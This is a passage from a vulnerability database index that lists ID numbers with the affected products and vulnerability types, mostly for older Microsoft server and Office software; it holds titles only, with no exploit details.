2000/2001/2003/2004 Numeric Error [32685] Microsoft Office 2000/2001/2003/2004 memory corruption [32676] Microsoft Office 2000/2001/2003/2004 privilege escalation [32675] Microsoft Office 2000/2003/2004/Xp privilege escalation [32055] Microsoft Visual Studio 6.0 tcprops.dll memory corruption [32006] Cybozu Garoon 2.1.0 For Windows sql injection [31692] Microsoft PowerPoint 2000/2001/2002/2003 memory corruption [31691] Microsoft Hyperlink Object Library hlink.dll object memory corruption [31679] IBM Informix Dynamic Server up to 9.40 on Windows memory corruption [31358] Microsoft PowerPoint 2003 powerpnt.exe denial of service [31354] Microsoft PowerPoint 2003 memory corruption [31351] Microsoft ISA Server 2004 Filters unknown vulnerability [31318] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31317] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31316] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31313] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31312] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31311] Microsoft Excel 2000/2002/2003/XP privilege escalation [31310] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [31237] Microsoft Office 2000/2003/Xp privilege escalation [31235] Microsoft Office 2000/2003/Xp memory corruption [31233] Microsoft Office 2000/2003/Xp mso.dll lscreateline memory corruption [29831] Microsoft Malware Protection Engine up to 1.1.10600.0 privilege escalation [29524] Microsoft ISA Server 2004 unknown vulnerability [29423] Microsoft Office 2000/2003/2004/Xp excel.exe privilege escalation [29414] Microsoft .NET Framework 1.0/1.1 memory corruption [29209] Microsoft Office 2000/2003/2004/Xp memory corruption [29208] Microsoft Office 2000/2003/2004/Xp memory corruption [29207] Microsoft Office 2000/2003/2004/Xp memory corruption [29206] Microsoft Office 2000/2003/2004/Xp memory corruption [29205] Microsoft Office 2000/2003/2004/Xp memory corruption [29005] Lighttpd 1.4.10 on Windows response.c information disclosure [28939] Microsoft Word 2003 denial of service [25752] Microsoft MSN Messenger weak encryption [25649] Microsoft IIS 5.0 Application Firewall cross site scripting [25518] Microsoft ISA Server 2000 Packet Filter unknown vulnerability [25517] Microsoft ISA Server 2000 unknown vulnerability [25397] Microsoft ISA Server 2000 wspsrv.exe denial of service [24822] Microsoft Outlook 2003 Outlook Web Access weak authentication [24640] Microsoft Office InfoPath 2003 SP1 information disclosure [24510] Microsoft Word 2000/2002/2003 memory corruption [24284] Microsoft SharePoint Team Services cross site scripting [24280] Microsoft Exchange Server up to 5.0 memory corruption [23648] Microsoft Word 6.0 memory corruption [22126] Microsoft Outlook 2003 Access Restriction privilege escalation [68417] Microsoft Exchange 2013 Outlook Web Access privilege escalation [68416] Microsoft Exchange 2007/2010/2013 Outlook Web Access privilege escalation [68409] Microsoft Office 2007/2010/2013 memory corruption [68408] Microsoft Excel 2007/2010/2013 privilege escalation [68407] Microsoft Excel 2007/2010 privilege escalation [68406] Microsoft Word memory corruption [68405] Microsoft Word 2007/2010 Index privilege escalation [68404] Microsoft IIS 7.5 Error Message mypage cross site scripting [68193] Microsoft IIS 8.0/8.5 IP/Domain Restriction privilege escalation [68191] Microsoft SharePoint 2010 cross site scripting [68188] Microsoft Word 2007 File privilege escalation [68187] Microsoft Word 2007 File privilege escalation [68186] Microsoft Word 2007 File privilege escalation [68185] Microsoft .NET Framework up to 4.5.2 Object privilege escalation [67829] Microsoft Office 2007/2010/2011 Object privilege escalation [67825] Microsoft .NET Framework 2.0/3.5/3.5.1 ASLR privilege escalation [67824] Microsoft .NET Framework up to 4.5.2 denial of service [67823] Microsoft .NET Framework up to 4.5.2 ClickOnce privilege escalation [67518] Microsoft Lync 2013 denial of service [67517] Microsoft Lync 2013 Script Reflected cross site scripting [67516] Microsoft Lync 2010/2013 privilege escalation [67514] Microsoft .NET Framework up to 4.5.2 Hash Collision Form denial of service [67452] Novell GroupWise Client 8.0x/2012/2014 on Windows denial of service [67361] Microsoft .NET Framework 1.1/2.0/3.0/3.5/3.5.1 ASLR privilege escalation [67360] Microsoft SharePoint 2013 App Permission Management privilege escalation [67354] Microsoft SQL Server 2008 R2 SP2/2008 SP3/2012 SP1/2014 SQL Master Data Services denial of service [67353] Microsoft SQL Server 2008 R2 SP2/2008 SP3/2012 SP1/2014 T-SQL Query cross site scripting [66976] Microsoft Access 2010 VBA denial of service [21964] Microsoft Java Virtual Machine 5.0.0.3810 Sandbox privilege escalation [21838] Microsoft Sharepoint Portal Server 2001 cross site scripting [21586] HD Soft Windows FTP Server up to 1.6 wscanf Format String [20941] NIPrint LPD-LPR Print Server up to 4.10 Windows Explorer Invoker privilege escalation [20870] Microsoft Wordperfect Converter Corel Wordperfect File memory corruption [20869] Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control memory corruption [20732] Microsoft SQL Server 7.0/2000 Named Pipe denial of service [20695] Microsoft ISA Server Error Page 400.htm/500.htm cross site scripting [20581] Sun One Application Server 7.0 on Windows Error Message cross site scripting [20580] Sun One Application Server 7.0 on Windows URI weak authentication [20579] Sun One Application Server 7.0 on Windows JSP Request Source information disclosure [20395] Microsoft Proxy Server/ISA Server Winsock Service denial of service [20327] Microsoft Word/Excel 98 Field Code information disclosure [20214] Microsoft ISA Server 2000 DNS Intrusion Detection Application Filter denial of service [20162] National University Of Singapore uxterm 2.3/2.4.1 Windows Title privilege escalation [20111] Apache HTTP Server up to 2.0.43 on Windows HTTP Request privilege escalation [20109] Microsoft Outlook 2002 V1 Exchange Server Security Certificate weak encryption [20037] Trend Micro Interscan Viruswall 3.52 on Windows gzip Content Encoding privilege escalation [19743] Microsoft Outlook 2002 javascript URI cross site scripting [19742] Microsoft Outlook 2000/2002 IFRAME privilege escalation [19671] Apache HTTP Server 1.3.20 on Windows /php/ privilege escalation [19650] Apache Tomcat 4.0.3 on Windows HTTP Request information disclosure [19623] Microsoft SQL Server up to 2000 SP2 Stored Procedure sp_MSSetServerProperties/sp_MSsetalertinfo privilege escalation [19563] MySQL up to 3.20.52 on Windows Service privilege escalation [19550] Microsoft IIS 5.0/5.1 HTTP Request denial of service [19518] Microsoft Exchange 2000 Request denial of service [19515] Microsoft Exchange 2000 Remote Procedure Call denial of service [19514] Microsoft SQL Server up to 2000 Authentication Password weak encryption [19500] Oracle Application Server up to 9.0.2.0.1 on Windows web-inf privilege escalation [19497] Macromedia JRun 3.0/3.1/4.0 on Windows web-inf privilege escalation [19474] Microsoft MSN Messenger up to 4.6 Request denial of service [19452] MySQL up to 3.23.2 on Windows weak authentication [19433] Microsoft IIS 4.0/5.0 SMTP Service privilege escalation [19388] Microsoft IIS 5.0 CodeBrws.asp memory corruption [19387] Microsoft IIS 5.0 CodeBrws.asp directory traversal [19361] Microsoft IIS 5.1 Frontpage Server Extension File colegal.htm directory traversal [19360] Microsoft IIS 5.1 GET Request /_vti_pvt/access.cnf Path information disclosure [19359] Microsoft Office XP Spreadsheet Host privilege escalation [19342] Microsoft MSN Messenger up to 4.6 memory corruption [19338] Microsoft IIS 4.0 File privilege escalation [19222] Microsoft Office Web Components 10 DataSourceControl ConnectionFile information disclosure [19221] Microsoft Office Web Components 10 Spreadsheet File information disclosure [19220] Microsoft Office Web Components 9/10 Chart Load File information disclosure [19218] Microsoft Outlook 2002 Header Field denial of service [19181] Microsoft Java Virtual Machine 1.1 Restriction privilege escalation [19180] Microsoft Java Virtual Machine 1.1 HTML Object Reference privilege escalation [19179] Microsoft Java Virtual Machine 1.1 CabCracker com.ms.vm.loader.cabcracker load0 privilege escalation [19178] Microsoft Java Virtual Machine up to 5.0.3805 Standard Security Manager com.ms.security.StandardSecurityManager privilege escalation [19177] Microsoft Java Virtual Machine 1.1 privilege escalation [19176] Microsoft Java Virtual Machine 1.1 Applet ClipBoardGetText/ClipBoardSetText Clipboard privilege escalation [19175] Microsoft Java Virtual Machine 1.1 getNativeServices memory corruption [19174] Microsoft Java Virtual Machine 1.1 getabsolutepath Directory information disclosure [19173] Microsoft Java Virtual Machine up to 1.1 Class Name Class.forName/ClassLoader.loadClass memory corruption [19172] Microsoft Java Virtual Machine 1.1 URL privilege escalation [19136] Microsoft IIS 5.0/5.1 WebDAV Memory denial of service [19135] Microsoft IIS up to 5.1 cross site scripting [19134] Microsoft IIS 5.0 Source Access Permission Script privilege escalation [19133] Microsoft IIS up to 5.1 dllhost.exe privilege escalation [19087] Microsoft SQL Server up to 7.0 Stored Procedure xp_runwebtask privilege escalation [19060] Microsoft SQL Server 7.0/2000 Data Engine privilege escalation [19059] Microsoft SQL Server 7.0/2000 Database Console Command memory corruption [18800] Microsoft SQL Server 2000 Authentication memory corruption [18789] Microsoft SQL Server 2000 SP2 Stored Procedure sp_MScopyscript privilege escalation [18786] Microsoft File Transfer Manager up to 3.x ActiveX Control Persist weak authentication [18785] Microsoft File Transfer Manager up to 3.x ActiveX Control memory corruption [18777] Microsoft Project 2000/2002 Office Web Components Copy/Paste privilege escalation [18776] Microsoft Project 2000/2002 Office Web Components LoadText File information disclosure [18774] Microsoft Project 2002 Office Web Components setTimeout privilege escalation [18755] Microsoft SQL Server 2000 Jet Engine opendatasource memory corruption [18745] Microsoft SQL Server 7.0/2000 Extended Stored Procedure privilege escalation [18742] Apache HTTP Server up to 2.0.39 on Windows/OS2/Netware Error Message Path information disclosure [18615] Microsoft SQL Server 2000 0x08 Packet denial of service [18609] Microsoft Exchange 5.5 Mail Connector memory corruption [18607] Microsoft SQL Server 7.0/2000 Data Access Components OpenRowSet memory corruption [18605] Apache HTTP Server up to 2.0.39 on Windows/OS2/Netware Backslash directory traversal [18598] Microsoft SQL Server 2000 Keep-Alive denial of service [18597] Microsoft SQL Server 2000 Resolution Service memory corruption [18596] Microsoft SQL Server 2000 Stored Procedure sql injection [18595] Microsoft SQL Server 2000 DBCC memory corruption [18593] Microsoft Word 2000 Mail Merge Tool privilege escalation [18592] Microsoft Excel 2000/2002 Macro Security privilege escalation [18591] Microsoft Excel 2000/2002 Macro Security privilege escalation [18590] Microsoft Excel 2000/2002 Macro Security privilege escalation [18528] Microsoft MSN Messenger 3.6 Communication weak authentication [18498] Microsoft IIS 5.0/5.1 WebDAV IP Address information disclosure [18497] Microsoft IIS 4.0 Change Password /iisadmpwd privilege escalation [18495] Microsoft IIS up to 5.1 NTLM Authentication information disclosure [18449] Microsoft .NET Framework 1.0 orderdetails.aspx information disclosure [18411] Microsoft SQL Server 2000 Query memory corruption [18410] Microsoft SQL Server 2000 Password Encryption memory corruption [18348] Microsoft IIS 4.0/5.0 HTR Request memory corruption [18346] Microsoft SQL Server 2000 SQLXML cross site scripting [18345] Microsoft SQL Server 2000 SQLXML ISAPI Extension memory corruption [18245] Microsoft Exchange 2000 RFC Message Attribute denial of service [18173] Apache HTTP Server 2.0.28 on Windows CGI Module php.exe Path information disclosure [18146] Microsoft MSN Messenger Service for Exchange 4.5/4.6 ActiveX Control memory corruption [18138] Microsoft Word 2000/2002 Rich Text Format cross site scripting [18134] Microsoft MSN Messenger 4.0 ActiveX Object information disclosure [18095] Microsoft SQL Server 7.0/2000 Extended Stored Procedure memory corruption [18076] Microsoft IIS 4.0/5.0/5.1 HTTP Header memory corruption [18075] Microsoft IIS 4.0/5.0/5.1 ASP Server-Side Include memory corruption [18074] Microsoft IIS 4.0/5.0/5.1 Error Page cross site scripting [18073] Microsoft IIS 4.0/5.0/5.1 ASP Data Transfer memory corruption [18072] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer memory corruption [18071] Microsoft IIS 4.0/5.0/5.1 Error cross site scripting [18070] Microsoft IIS 4.0/5.0/5.1 Help File Search cross site scripting [18069] Microsoft IIS 4.0/5.0/5.1 FTP Service denial of service [18068] Microsoft IIS 4.0/5.0/5.1 URL Parser w3svc.dll denial of service [18067] Microsoft IIS 4.0/5.0 HTR ISAPI Extension ism.dll memory corruption [17961] Microsoft SQL Server 7.0/2000 OLE DB Provider memory corruption [17955] Microsoft Exchange 2000 Privilege Registry privilege escalation [17948] Microsoft Office on Mac PID Checker denial of service [17852] Microsoft ISA Server 2000 UDP Packet denial of service [17762] Microsoft SQL Server 7.0/2000 C Runtime Format String [17759] Microsoft SQL Server 7.0/2000 memory corruption [17743] Citrix ICA Client 6.1 on Windows ICA File privilege escalation [17735] Microsoft IIS 5.0 Content-Length Header denial of service [17662] Microsoft Exchange 5.5 Outlook Web Access privilege escalation [17604] Microsoft IIS 3.0/4.0/5.0 Web Log Entry weak authentication [17583] Microsoft Excel/PowerPoint 98/2000/2001/2002 Data Stream privilege escalation [17571] Microsoft Exchange 5.5 Outlook Web Access User information disclosure [17569] Microsoft IIS 4.0 Redirect denial of service [17424] Microsoft IIS up to 4.0 Unicode Character Source information disclosure [17388] Microsoft ISA Server 2000 URL cross site scripting [17374] Microsoft ISA Server 2000 H.323 denial of service [17370] Microsoft IIS 5.0 WebDAV denial of service [17360] Microsoft IIS 4.0 Index Server SQLQHit.asp information disclosure [17161] Microsoft Outlook 2002 View ActiveX Control privilege escalation [17050] Microsoft Exchange 2000/5.5 Outlook Web Access cross site scripting [17015] Microsoft Exchange 2000/5.5 LDAP denial of service [16972] IRIX/Linux/Windows MSS denial of service [16965] Microsoft IIS 4.0/5.0 Device File asp.dll Scripting.FileSystemObject denial of service [16917] Microsoft ISA Server 2000 Web Proxy denial of service [16839] Microsoft IIS 5.0 MS01-014/MS01-016 Patches denial of service [16838] Microsoft IIS 5.0 MS00-060 Patch denial of service [16837] Microsoft Internet Information Server 4.0/5.0 FTP Service User information disclosure [16836] Microsoft IIS 5.0 FTP Service denial of service [16835] Microsoft IIS 3.0/4.0/5.0 Escape Character directory traversal [16754] Microsoft Outlook up to 2000 Holiday Feature weak authentication [16709] Microsoft IIS 5.0 WebDAV Request denial of service [16705] Microsoft Exchange/IIS URL Memory denial of service [16602] Microsoft Visual Studio 6.0 VB-TSQL Debugger vbsdicli.exe memory corruption [16599] Microsoft Outlook 2000/98/5.0 vCard memory corruption [16493] Microsoft Exchange 5.0/5.5 SMTP Command memory corruption [16425] Microsoft IIS 4.0/5.0 Frontpage Server Extensions denial of service [16371] Microsoft IIS 4.0/5.0 URL File information disclosure [16369] Microsoft IIS 4.0/5.0 Double Byte Character Set Source information disclosure [16295] Microsoft Exchange 2000 User Account weak authentication [16260] Microsoft IIS 4.0/5.0 Error Message cross site scripting [16181] Microsoft IIS 4.0/5.0 ASP Session Cookie weak authentication [16162] Microsoft IIS 5.0 Index Server privilege escalation [16108] Microsoft IIS 4.0/5.0 Executable Files Parser privilege escalation [16106] Microsoft IIS 4.0/5.0 Unicode directory traversal [16027] Microsoft Exchange 5.5 MIME Header denial of service [15989] Microsoft IIS 4.0 URL INETINFO.EXE denial of service [15930] Microsoft Word 2000 Mail Merge Tool privilege escalation [15920] Microsoft IIS 5.0 ASP File privilege escalation [15912] Microsoft IIS 4.0/5.0 File Permission privilege escalation [15907] Microsoft Word/Excel/Powerpoint 2000 Object Tag memory corruption [15898] Microsoft Outlook 98/2000 vCard denial of service [15895] Microsoft Outlook 97/98/2000 Rich Text Path information disclosure [15888] Microsoft IIS 4.0/5.0 Error Message shtml.dll cross site scripting [15782] Microsoft Outlook up to 2000 Cache privilege escalation [15773] Microsoft Outlook up to 2000 Date Field memory corruption [15770] Microsoft IIS 4.0/5.0 Request privilege escalation [15766] Microsoft IIS 3.0/4.0/5.0 Administrative Script denial of service [15764] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 HTTP 1.0 Request IP Address information disclosure [15626] Microsoft Exchange 4.0/5.0 Field Blank denial of service [15608] Apache HTTP Server up to 1.3.6.2 on Windows Directory information disclosure [15548] Microsoft Outlook up to 98 Message denial of service [15546] Microsoft IIS 4.0/5.0 HTR Request ISM.DLL privilege escalation [15542] Microsoft Office 2000 UA ActiveX Control Show Me privilege escalation [15540] Microsoft IIS 4.0/5.0 File Extension denial of service [15535] Microsoft IIS 4.0/5.0 HTR Request inetinfo.exe denial of service [15530] Microsoft IIS 4.0/5.0 Frontpage Server Extensions shtml.exe Path information disclosure [15444] Microsoft IIS 4.0/5.0 URL privilege escalation [15422] Microsoft Excel 97/2000 XLM 7PK Security Features [15416] Microsoft IIS 4.0/5.0 ISAPI Extension Source information disclosure [15400] Microsoft IIS 4.0 Chunked Transfer Encoding memory corruption [15379] Microsoft SQL Server 7.0 SELECT Statement privilege escalation [15376] Microsoft Clip Art Gallery 5.0 CIL File memory corruption [15364] Microsoft Exchange Read Receipt denial of service [15300] Microsoft IIS 3.0/4.0 Frontpage Server Extensions /_vti_bin/shtml.dll Username information disclosure [15270] Microsoft IIS 3.0/4.0 Sample Internet Data Query Script directory traversal [15265] Microsoft IIS Visual Basic Script denial of service [15243] Microsoft IIS 4.0 IDA/IDQ File Path information disclosure [15206] Microsoft IIS 4.0 Microsoft Visual InterDev weak authentication [15195] Microsoft PowerPoint 95/97 Slide Show privilege escalation [15186] Microsoft IIS 4.0 winmsdp.exe privilege escalation [15163] DEC OpenVMS 5.3/5.5.2 VMS DECwindows/MOTIF weak authentication [15149] Microsoft IIS 4.0 Domain Resolution privilege escalation [15148] Microsoft IIS 3.0 ASP Site denial of service [15141] Microsoft IIS 4.0 FTP Server denial of service [15126] Microsoft Excel 97 Russian New Year Call privilege escalation [15125] Microsoft Exchange 5.0/5.5 NNTP/SMTP denial of service [15123] Microsoft IIS 3.0/4.0 on x86/Alpha HTTP GET denial of service [15120] Microsoft IIS 2.0/3.0 ASP Source information disclosure [15080] Microsoft IIS 4.0 ASP File Source information disclosure [15079] Microsoft IIS 4.0 URL privilege escalation [15056] Microsoft Exchange 5.0/5.5 Access Control List Configuration [15054] Apache HTTP Server on Windows URL privilege escalation [14990] Microsoft SQL Server 7.0 TDS Packet privilege escalation [14905] Microsoft Java Virtual Machine Sandbox Configuration [14860] Microsoft MSN Messenger 4.71.0.10 setupbbs.ocx vAddNewsServer/bIsNewsServerConfigured memory corruption [14853] Microsoft IIS 4.0 File privilege escalation [14783] Microsoft IIS 3.0/4.0 Asian Language Configuration [14772] Microsoft IIS 4.0 HTTP Request privilege escalation [14771] Microsoft IIS 3.0 SSL ISAPI Filter race condition [14759] Microsoft Exchange 5.5 SMTP Address privilege escalation [14731] Microsoft IIS 3.0/4.0 Data Access Components privilege escalation [14722] Microsoft IIS 3.0/4.0 SSL denial of service [14721] Microsoft IIS 4.0 Sun Java HotSpot denial of service [14703] Microsoft Outlook 97/98/2000 X-UIDL Header denial of service [14694] Microsoft IIS 4.0 Request IDC memory corruption [14648] Microsoft IIS denial of service [14640] Microsoft IIS 4.0 codebrws.asp privilege escalation [14639] Microsoft IIS 4.0 code.asp privilege escalation [14638] Microsoft IIS 4.0 viewcode.asp privilege escalation [14637] Microsoft IIS 4.0 showcode.asp privilege escalation [14636] Microsoft Excel 97 Malware Warning privilege escalation [14539] Microsoft Exchange SMTP Service denial of service [14536] Microsoft Frontpage/Personal Web Server URL privilege escalation [14512] Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion privilege escalation [14496] Microsoft IIS 3.0/4.0 ASP showfile.asp FileSystemObject privilege escalation [14492] Microsoft IIS 4.0 /IISADMPWD privilege escalation [14467] Microsoft IIS 3.0/4.0 FTP Server memory corruption [14466] Microsoft IIS 4.0 ASP Caching information disclosure [14465] Microsoft IIS 2.0/3.0/4.0/5.0 IISAPI Extension perl.exe information disclosure [14458] Microsoft IIS 3.0/4.0 NLST Command denial of service [14450] Microsoft IIS 4.0 Frontpage Server Extensions fpcount.exe memory corruption [14349] Microsoft IIS Server Side Includes #exec privilege escalation [14324] Microsoft IIS 4.0 Log privilege escalation [14314] Microsoft Access 97 Password weak encryption [14271] Microsoft Exchange 5.5 LDAP Bind bind memory corruption [14157] Microsoft IIS 3.0/4.0 PKCS #1 information disclosure [14140] Microsoft IIS 3.0/4.0 ASP File information disclosure [14074] Microsoft IIS 4.0 File Name privilege escalation [14050] Microsoft Exchange 4.0/5.0 SMTP HELO memory corruption [13974] Microsoft IIS 3.0 newdsn.exe privilege escalation [13908] Microsoft IIS 2.0/3.0 URL denial of service [13812] Microsoft IIS 1.0/2.0/3.0 ASP Code privilege escalation [13725] Microsoft IIS 1.0 cmd privilege escalation [13547] Microsoft Lync 2010/2013 Meeting cross site scripting [13545] Microsoft Word 2007 Embedded Font memory corruption [13462] Microsoft Visual Studio 2002/2003/2005/2010 Debug Interface msdia.dll privilege escalation [13394] IBM DB2 up to 10.5.0.2 on Windows Stored Procedure privilege escalation [13230] Microsoft .NET Framework up to 4.5.1 TypeFilterLevel Check privilege escalation [13229] Microsoft Office 2007/2010/2013 Common Control Library MSCOMCTL.OCX privilege escalation [13228] Microsoft Office 2013 Document information disclosure [13227] Microsoft Office 2007/2010/2013 Chinese Grammar Checker privilege escalation [13226] Microsoft SharePoint Server 2007/2010/2013 Page privilege escalation [13225] Microsoft SharePoint Server 2007/2010/2013 cross site scripting [13224] Microsoft SharePoint Server 2007/2010/2013 Page privilege escalation [12859] Microsoft Word 2003 Office Document memory corruption [12845] Microsoft Word 2003 Office File memory corruption [12844] Microsoft Word 2007/2010 Office File memory corruption [12843] Microsoft Office 2007/2010/2011/2013 XML Parser denial of service [12801] Microsoft Xbox Live Password Recovery weak authentication [12693] haxx.se cURL/libcURL up to 7.35.0 on Windows Schannel SSL Backend privilege escalation [12687] Microsoft Word/Office/Outlook 2003/2007/2010/2013 RTF Document memory corruption [12311] Microsoft Lync 2010 Search privilege escalation [12271] Microsoft .NET Framework up to 4.5.1 HTTP POST privilege escalation [12266] Microsoft .NET Framework 2.0 SP2/3.5.1 ASLR privilege escalation [12265] Microsoft .NET Framework up to 4.5.1 privilege escalation [12185] Microsoft .NET Framework 2/4 HMAC weak authentication [12116] Pidgin 2.10.7 on Windows file:/ gtkutils.c privilege escalation [12089] Microsoft Bing 4.2.0 on Android DNS Response APK File Installation privilege escalation [12070] Apple Pages 2.0/2.0.1/2.0.2/5.0/5.0.1 on Mac Microsoft Word Document denial of service [11951] Microsoft Word/Office/Sharepoint Office File memory corruption [11950] Microsoft Office Compability Pack/Word 2007 SP3 File memory corruption [11949] Microsoft Word Viewer/Office Compatibility Pack/Word 2003 SP3/2007 SP3 File memory corruption [11494] Microsoft .NET Framework 2.0 SP2/3.5.1/4/4.5/4.5.1 MAC Authentication privilege escalation [11468] Microsoft Exchange 2010/2013 cross site scripting [11466] Microsoft Office 2013 File Response information disclosure [11457] Microsoft SharePoint Server/Office Web Apps 2010 SP1/2010 SP2/2013 W3WP Service Account privilege escalation [11448] Microsoft Office 2007/2010 Address Space Layout Randomization privilege escalation [11230] Microsoft Word 2003 DOC Document denial of service [11151] Microsoft Outlook -/2007/2010/2013 S/MIME Certificate Metadata Expansion information disclosure [11149] Microsoft Office -/2003/2007/2010/2013 WordPerfect Document epsimp32.flt memory corruption [11148] Microsoft Office 2003/2007 WordPerfect Document epsimp32.flt memory corruption [11146] Microsoft Office 2003/2007 epsimp32.flt memory corruption [10648] Microsoft Word 2007 Word File memory corruption [10647] Microsoft Word 2003 Word File memory corruption [10643] Microsoft SharePoint Server 2007/2010/2013 Input Sanitizer memory corruption [10642] Microsoft SharePoint Server 2007/2010 Content Display in Frames privilege escalation [10640] Microsoft .NET Framework up to 4.5 JSON Data privilege escalation [10639] Microsoft .NET Framework up to 4.5 XML External Entity privilege escalation [10250] Microsoft SharePoint Server up to 2013 W3WP Process privilege escalation [10249] Microsoft SharePoint 2010/2003/2007/2.0/3.0 Workflow privilege escalation [10248] Microsoft SharePoint Server up to 2013 cross site scripting [10247] Microsoft SharePoint Server 2007/2010/2013 Online Cloud cross site scripting [10245] Microsoft Office 2003/2007/2010 Word File memory corruption [10244] Microsoft Office 2003 SP3 Word File memory corruption [10243] Microsoft Office 2003/2007 Word File memory corruption [10242] Microsoft Office 2007 Word File memory corruption [10241] Microsoft Office 2007 Word File memory corruption [10240] Microsoft Office 2003/2007/2010 Word File memory corruption [10239] Microsoft Office 2003/2007 Word File memory corruption [10238] Microsoft Excel 2003/2007 XML External Entity Data memory corruption [10237] Microsoft Excel 2003/2007/2010 XML External Entity Data privilege escalation [10236] Microsoft Word/Office 2003/2007 XML External Entity Data information disclosure [10235] Microsoft Excel/Office/SharePoint Office File memory corruption [10234] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10233] Microsoft Word/Sharepoint Office File memory corruption [10232] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10231] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10230] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10229] Microsoft Access 2007/2010/2013 Access File memory corruption [10228] Microsoft Access 2007/2010/2013 Access File memory corruption [10227] Microsoft Access 2007/2010/2013 Access File memory corruption [10189] Microsoft Outlook 2007/2010 S/MIME denial of service [9715] Microsoft PowerPoint 2007 DirectShow Runtime quartz.dll GetMaxSampleSize memory corruption [9558] Novell GroupWise Client up to 2012 12.0.1 HP1 on Windows Javascript/Active X Script cross site scripting [9397] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Array privilege escalation [9395] Microsoft .NET Framework up to 4.5 Object Delegation privilege escalation [9394] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 on 64-bit Array privilege escalation [9393] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Permission privilege escalation [9392] Microsoft .NET Framework up to 4.5 Permission privilege escalation [9189] Microsoft Outlook S/MIME weak encryption [8747] Microsoft Malware Protection Engine 1.1.9402.0 File Scan memory corruption [8737] Microsoft Word 2003 SP3 Shape Data Parser privilege escalation [8725] Microsoft Lync 2010/2013 memory corruption [8724] Microsoft .NET Framework 4.5 WCF Authentication Endpoint Setup weak authentication [8723] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 XML File privilege escalation [8206] Microsoft SharePoint Server 2010 SP1 HTML Sanitization Component cross site scripting [8200] Microsoft SharePoint Server 2013 ACL privilege escalation [8172] Microsoft Skype up to 6.2.0.106 unknown vulnerability [7981] FFmpeg up to 1.1.3 Microsoft RLE Data msrledec.c msrle_decode_8_16_24_32 memory corruption [7971] Microsoft Office for Mac 2011 up to 14.3.1 on Mac HTML5 Mail Message Parser information disclosure [7968] Microsoft SharePoint Server 2010 SP1 Input Validator memory corruption [7967] Microsoft SharePoint Server 2010 SP1 User Account directory traversal [7966] Microsoft SharePoint Server 2010 SP1 cross site scripting [7965] Microsoft SharePoint Server 2010 SP1 User Account Callback privilege escalation [7642] Microsoft Exchange 2007/2010 Outlook Web Access vspdx.dll) memory corruption [7343] Microsoft Lync 2012 HTTP Format String [7259] Microsoft .NET Framework 3.5/3.5 SP1/3.5.1/4 Replace privilege escalation [7256] Microsoft .NET Framework up to 4.5 XBAP privilege escalation [7255] Microsoft .NET Framework up to 4.5 System.DirectoryServices.Protocolsb Method memory corruption [7254] Microsoft .NET Framework up to 4.5 XAML Browser Application memory corruption [7253] Microsoft .NET Framework up to 4.5 Code Access Security information disclosure [7230] Microsoft Excel 2010 SP1 on 32-bit XLS File denial of service [7209] NetIQ eDirectory up to 8.8.7.1 on Windows HTTP Request denial of service [7121] Microsoft Exchange 2007/2010 RSS Feed privilege escalation [7056] FreeSSHD 1.2.1/1.2.2/1.2.6 on Windows Authentication freeSSHd.exe weak authentication [6969] Adobe ColdFusion 10.0 on Windows denial of service [6935] Microsoft Office Excel 2003/2007/2010 Input Sanitizer memory corruption [6934] Microsoft Office Excel 2003/2007/2010 Input Sanitizer memory corruption [6933] Microsoft Office Excel 2003/2007/2010 SerAuxErrBar memory corruption [6930] Microsoft .NET Framework 4.0/4.5 Reflection Optimization Object Permission privilege escalation [6929] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Web Proxy Setting Auto-Discovery privilege escalation [6928] Microsoft .NET Framework up to 4 Path Subversion Libraries privilege escalation [6927] Microsoft .NET Framework 2.0 SP2/3.5.1 Trusted Code Function information disclosure [6926] Microsoft .NET Framework 1.0 SP3/1.1 SP1/2.0 SP2/3.5.1/4 Object Permission Handller privilege escalation [6925] Microsoft IIS 7.0/7.5 FTP Command information disclosure [6924] Microsoft IIS 7.5 Log File Permission information disclosure [6918] Microsoft Excel 2007 SP2 Input Sanitizer memory corruption [6831] Microsoft Office Picture Manager 2010 File memory corruption [6830] Microsoft Word 2007/2010 File memory corruption [6819] Microsoft Excel 2007 File memory corruption [6626] Microsoft SharePoint/Lync/Infopath 2007/2010 HTML Sanitization cross site scripting [6624] Microsoft SQL Server up to 2012 Report Manager cross site scripting [6622] Microsoft Word -/2003/2007/2010 RTF Document denial of service [6621] Microsoft Word 2007 PAPX privilege escalation [6563] Novell GroupWise 2012/8.0/8.00/8.01/8.02 Client for Windows memory corruption [5945] Microsoft Office 2007/2010 memory corruption [5933] Microsoft SQL Server 2000/2005/2008/2008 R2 Common Controls TabStrip ActiveX MSCOMCTL.OCX privilege escalation [5932] Microsoft Office 2003/2007/2010 Common Controls TabStrip ActiveX MSCOMCTL.OCX privilege escalation [5906] Citrix Access Gateway Plugin up to 9.3.49.5 on Windows nsepa.exe StartEPA memory corruption [5649] Microsoft Office 2003/2007/2010 libraries privilege escalation [5645] Microsoft SharePoint 2007/2010/3.0 Reflected cross site scripting [5644] Microsoft SharePoint 2010 scriptesx.ashx cross site scripting [5643] Microsoft SharePoint 2007/2010 privilege escalation [5642] Microsoft SharePoint 2007 privilege escalation [5641] Microsoft SharePoint 2010 cross site scripting [5636] Microsoft Outlook Web App up to 14.1.287.0 owa/redir.aspx weak authentication [5623] Microsoft IIS up to 7.5 File Name Tilde privilege escalation [5518] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 privilege escalation [5474] Microsoft WordPad 